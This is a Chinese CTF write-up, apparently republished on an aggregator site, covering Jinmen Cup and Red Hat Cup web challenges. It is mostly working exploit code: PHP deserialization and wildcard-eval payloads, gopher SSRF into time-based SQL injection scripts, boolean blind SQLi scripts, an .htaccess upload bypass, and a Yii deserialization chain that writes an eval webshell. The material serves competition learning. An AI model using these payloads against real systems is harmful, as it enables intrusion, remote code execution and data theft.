津门杯&红帽杯
Posted w0s1np
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了津门杯&红帽杯相关的知识,希望对你有一定的参考价值。
津门杯&红帽杯
津门杯
power_cut
<?php
class logger{
public $logFile;
public $initMsg;
public $exitMsg;
function __construct($file){
// initialise variables
$this->initMsg="#--session started--#\\n";
$this->exitMsg="#--session end--#\\n";
$this->logFile = $file;
readfile($this->logFile);
}
function log($msg){
$fd=fopen($this->logFile,"a+");
fwrite($fd,$msg."\\n");
fclose($fd);
}
function __destruct(){
echo "this is destruct";
}
}
class weblog {
public $weblogfile;
function __construct() {
$flag="system(\'cat /flag\')";
echo "$flag";
}
function __wakeup(){
// self::waf($this->filepath);
$obj = new logger($this->weblogfile);
}
public function waf($str){
$str=preg_replace("/[<>*#\'|?\\n ]/","",$str);
$str=str_replace(\'flag\',\'\',$str);
return $str;
}
function __destruct(){
echo "this is destruct";
}
}
$log = $_GET[\'log\'];
$log = preg_replace("/[<>*#\'|?\\n ]/","",$log);
$log = str_replace(\'flag\',\'\',$log);
$log_unser = unserialize($log);
?>
利用到logger
里面的readfile
函数,直接去读flag
,str_replace
的绕过双写就好了
exp:
双写绕一下替换
<?php
class weblog {
public $weblogfile=\'/flag\';
}
$a = new weblog();
echo serialize($a);
?>
//O:6:"weblog":1:{s:10:"weblogfile";s:5:"/flflagag";}
hate_php
<?php
error_reporting(0);
if(!isset($_GET[\'code\'])){
highlight_file(__FILE__);
}else{
$code = $_GET[\'code\'];
if(preg_match("/[A-Za-z0-9_$@]+/",$code)){
die(\'fighting!\');
}
eval($code);
}
直接利用通配符:
?><?=`/???/???%20/????`?> 即?><?=`/bin/cat /flag`?>
GoOSS
go代码,没学,复现不出
UploadHub
发现在配置层面禁止了upload沙盒解析php
搜索资料发现,配置文件的<directory>
晚于htaccess
执行,所以确定此题目为.htaccess
的利用
测试发现<file>
标签比<directory>
优先级高
发现在配置层面禁止了upload沙盒解析php
搜索资料发现,配置文件的<directory>
晚于htaccess
执行,所以确定此题目为.htaccess
的利用
测试发现<file>
标签比<directory>
优先级高
或者传htaccess
<FilesMatch "1.png">
SetHandler application/x-httpd-php
php_flag engine on
</FilesMatch>
easysql
<?php
highlight_file(__FILE__);
session_start();
$url = $_GET[\'url\'] ?? false;
if($url)
{
$a = preg_match("/file|dict/i", $url);
if ($a==1)
{
exit();
}
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $_GET["url"]);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_exec($ch);
curl_close($ch);
}
?>
访问3306
是的开启的,题目没有过滤gopher,又开启了mysql,所以目前思路是通过gopher打mysql
扫描后发现一个admin.php…
考虑一下是不是sql注入,没有回显的话应该是盲注
import urllib
import requests
test=\\
"""POST /admin.php HTTP/1.1
Host: 121.36.147.29:20001
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:12.0) Gecko/20100101 Firefox/12.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Cookie: PHPSESSID=56kc25u2min9of3rup6d059ff2
Content-Type: application/x-www-form-urlencoded
Content-Length: 6
Connection: close
poc=1\' and sleep(10)#
"""
tmp = urllib.parse.quote(test)
new = tmp.replace(\'%0A\',\'%0D%0A\')
result = \'_\'+new
print(result)
?url=gopher://127.0.0.1:80/_POST%20/admin.php%20HTTP/1.1%0D%0AHost%3A%20121.36.147.29%3A20001%0D%0AUser-Agent%3A%20Mozilla/5.0%20%28Windows%20NT%206.2%3B%20WOW64%3B%20rv%3A12.0%29%20Gecko/20100101%20Firefox/12.0%0D%0AAccept%3A%20text/html%2Capplication/xhtml%2Bxml%2Capplication/xml%3Bq%3D0.9%2C%2A/%2A%3Bq%3D0.8%0D%0AAccept-Language%3A%20zh-cn%2Czh%3Bq%3D0.8%2Cen-us%3Bq%3D0.5%2Cen%3Bq%3D0.3%0D%0ACookie%3A%20PHPSESSID%3D56kc25u2min9of3rup6d059ff2%0D%0AContent-Type%3A%20application/x-www-form-urlencoded%0D%0AContent-Length%3A%206%0D%0AConnection%3A%20close%0D%0A%0D%0Apoc%3D1%27%20and%20sleep%2810%29%23%0D%0A
?url=gopher%3A%2f%2f127.0.0.1%3A80%2f_POST%2520%2fadmin.php%2520HTTP%2f1.1%250D%250AHost%253A%2520121.36.147.29%253A20001%250D%250AUser-Agent%253A%2520Mozilla%2f5.0%2520%2528Windows%2520NT%25206.2%253B%2520WOW64%253B%2520rv%253A12.0%2529%2520Gecko%2f20100101%2520Firefox%2f12.0%250D%250AAccept%253A%2520text%2fhtml%252Capplication%2fxhtml%252Bxml%252Capplication%2fxml%253Bq%253D0.9%252C%252A%2f%252A%253Bq%253D0.8%250D%250AAccept-Language%253A%2520zh-cn%252Czh%253Bq%253D0.8%252Cen-us%253Bq%253D0.5%252Cen%253Bq%253D0.3%250D%250ACookie%253A%2520PHPSESSID%253D56kc25u2min9of3rup6d059ff2%250D%250AContent-Type%253A%2520application%2fx-www-form-urlencoded%250D%250AContent-Length%253A%25206%250D%250AConnection%253A%2520close%250D%250A%250D%250Apoc%253D1%2527%2520and%2520sleep%252810%2529%2523%250D%250A
但是…这样注入怕是猴年马月,结合py脚本:
<?php
$payload = "poc=" . $argv[1];
//$payload = "poc=if((select ascii(substr(database(),1,1)))=115,sleep(0.4),1)";
$test = "POST /admin.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
X-Forwarded-For: 127.0.0.1
cache-control: no-cache
Postman-Token: 375ba985-8106-4d79-bafd-dff6654589b8
User-Agent: PostmanRuntime/7.6.0
Accept: */*
Host: 127.0.0.1
Content-Length: " . strlen($payload) . "
Connection: close
" . $payload . "
";
echo urlencode(("gopher://127.0.0.1:80/_" . rawurlencode($test)));
生成gopher
协议去访问127.0.0.1/admin.php
import requests
import time
import urllib
import os
url = \'http://121.36.147.29:20001/?url=\'
s=requests.Session()
x=""
payload = \'\'
for Len in range(1,50):
max = 127
min = 34
while max >= min:
mid = (max + min) // 2
payload = \'if((select ascii(substr((select flag from flag),1,{})))>{},sleep(0.2),1)\'.format(Len,mid)
print(payload)
tmp_r = os.popen(\'D:\\phpstudy_pro\\WWW\\index.php "\'+payload+\'"\').read()
before_time = time.time()
tmp_url = url+tmp_r
print(tmp_url)
r = requests.get(tmp_url)
after_time = time.time()
offset = after_time-before_time
if (offset>2):
min = mid + 1
else:
max = mid
if max == mid == min:
x += chr(mid)
print("success:{} length:{}".format(x, len(x)))
break
或者利用[[SQL注入技巧\\]配合Python-Flask的中转注入]
from flask import Flask,request
from urllib.parse import quote
import requests
def urlencode(s):
res=\'\'
for c in s:
fuck=hex(ord(c)).split(\'0x\')[1]
if len(fuck)==1:
fuck=\'0\'+fuck
res+="%"+fuck
return res
fuckhtml=\'\'\'POST /admin.php HTTP/1.1
Host: 121.36.147.29:20001
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:12.0) Gecko/20100101 Firefox/12.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Cookie: PHPSESSID=56kc25u2min9of3rup6d059ff2
Content-Type: application/x-www-form-urlencoded
Content-Length: {length}
Connection: close
poc={username}\'\'\'.replace("\\n","\\r\\n")
tmpPayload= fuckhtml.split("\\r\\n")[-1]
tmplength = len(tmpPayload) - len(\'{username}\')
url="http://121.36.147.29:20001/?url=gopher%3A%2F%2F127.0.0.1:80%2F_"
app = Flask(__name__)
@app.route(\'/\')
def hello_world():
username=request.args.get(\'username\')
shit=fuckhtml.format(username=username,length=str(tmplength+len(username)))
cookies={\'PHPSESSID\':\'qitbcj1puicm4qcpf8oe1fgc17\'}
page=requests.get(url+urlencode(urlencode(shit)),proxies={\'http\':\'http://127.0.0.1:8081\'},cookies=cookies).text
return page
if __name__ == \'__main__\':
app.run(host=\'0.0.0.0\')
然后再用sqlmap
跑
红帽杯
find_it
<?php
#Really easy...
$file=fopen("flag.php","r") or die("Unable 2 open!");
$I_know_you_wanna_but_i_will_not_give_you_hhh = fread($file,filesize("flag.php"));
$hack=fopen("hack.php","w") or die("Unable 2 open");
$a=$_GET[\'code\'];
if(preg_match(\'/system|eval|exec|base|compress|chr|ord|str|replace|pack|assert|preg|replace|create|function|call|\\~|\\^|\\`|flag|cat|tac|more|tail|echo|require|include|proc|open|read|shell|file|put|get|contents|dir|link|dl|var|dump/\',$a)){
die("you die");
}
if(strlen($a)>33){
die("nonono.");
}
fwrite($hack,$a);
fwrite($hack,$I_know_you_wanna_but_i_will_not_give_you_hhh);
fclose($file);
fclose($hack);
?>
非预期payload
:
?code=<?php phpinfo();?>
访问hack.php
就好了
预期:
?code=<?php%20show_source("fl"."ag.php");
framework
yii反序列化漏洞,payload如下:
/index.php?r=site/about&message=GET%20/r=site/about&message=TzoyMzoieWlpXGRiXEJhdGNoUXVlcnlSZXN1bHQiOjE6e3M6MzY6IgB5aWlcZGJcQmF0Y2hRdWVyeVJlc3VsdABfZGF0YVJlYWRlciI7TzoxNToiRmFrZXJcR2VuZXJhdG9yIjoxOntzOjEzOiIAKgBmb3JtYXR0ZXJzIjthOjE6e3M6NToiY2xvc2UiO2E6Mjp7aTowO086MjE6InlpaVxyZXN0XENyZWF0ZUFjdGlvbiI6Mjp7czoxMToiY2hlY2tBY2Nlc3MiO3M6NzoicGhwaW5mbyI7czoyOiJpZCI7czoxOiIxIjt9aToxO3M6MzoicnVuIjt9fX19
得到一个不完整的phpinfo
发现system
、eval
之类的一些函数好像都没有效果,猜测可能设置了disable_functions
不过最后发现assert
能用、file_put_contents()
也能用
<?php
namespace yii\\rest{
class CreateAction{
public $checkAccess;
public $id;
public function __construct(){
$this->checkAccess = \'assert\';
$this->id = \'file_put_contents(\\\'w0s1np.php\\\',\\\'<?php eval($_POST[0]);?>\\\');\';
}
}
}
namespace Faker{
use yii\\rest\\CreateAction;
class Generator{
protected $formatters;
public function __construct(){
$this->formatters[\'close\'] = [new CreateAction(), \'run\'];
}
}
}
namespace yii\\db{
use Faker\\Generator;
class BatchQueryResult{
private $_dataReader;
public function __construct(){
$this->_dataReader = new Generator;
}
}
}
namespace{
echo base64_encode(serialize(new yii\\db\\BatchQueryResult));
}
?>
/index.php?r=site/about&message=GET%20/r=site/about&message=TzoyMzoieWlpXGRiXEJhdGNoUXVlcnlSZXN1bHQiOjE6e3M6MzY6IgB5aWlcZGJcQmF0Y2hRdWVyeVJlc3VsdABfZGF0YVJlYWRlciI7TzoxNToiRmFrZXJcR2VuZXJhdG9yIjoxOntzOjEzOiIAKgBmb3JtYXR0ZXJzIjthOjE6e3M6NToiY2xvc2UiO2E6Mjp7aTowO086MjE6InlpaVxyZXN0XENyZWF0ZUFjdGlvbiI6Mjp7czoxMToiY2hlY2tBY2Nlc3MiO3M6NjoiYXNzZXJ0IjtzOjI6ImlkIjtzOjU5OiJmaWxlX3B1dF9jb250ZW50cygnbW9jaHU3LnBocCcsJzw/cGhwIGV2YWwoJF9QT1NUWzddKTs/PicpOyI7fWk6MTtzOjM6InJ1biI7fX19fQ==
然后连接蚂蚁的剑进行读取flag
WebsiteManger
发现id
与数据库有关联
布尔盲注
import string
from requests import *
allstr = \'0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!"#$%&\\\'()*+,-./:;<=>?@[\\]^_`{|}~\'
myurl = \'http://eci-2ze8j3xqhbs4y2thbqra.cloudeci1.ichunqiu.com/image.php\'
info = \'\'
for i in range(1,50):
for s in allstr:
payload = \'?id=if((ascii(mid(database(),{},1))={}),1,5)\'.format(i,ord(s))
resp = get(url=myurl+payload)
if len(resp.text) > 4000:
info += s
print(info)
payload = \'?id=if((ascii(mid(database(),{},1))={}),1,5)\'.format(i,ord(s))
payload = \'?id=if(ascii(mid((select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema=\\\'ctf\\\'),{},1))={},1,5)\'.format(i,ord(s))
payload = \'?id=if(ascii(mid((select/**/group_concat(username,password)/**/from/**/ctf.users),{},1))={},1,5)\'.format(i,ord(s))
注入查询到信息
Current_database: ctf
Tables_in_ctf: images,users
Columns_in_users: username,password
curl.php
这里应该存在SSRF
尝试file://
协议去读文件
直接读file:///flag
ezlight
phar反序列化
https://www.gem-love.com/websecurity/2763.html
以上是关于津门杯&红帽杯的主要内容,如果未能解决你的问题,请参考以下文章
[网络安全提高篇] 一〇九.津门杯CTF的Web Write-Up万字详解(SSRF文件上传SQL注入代码审计中国蚁剑)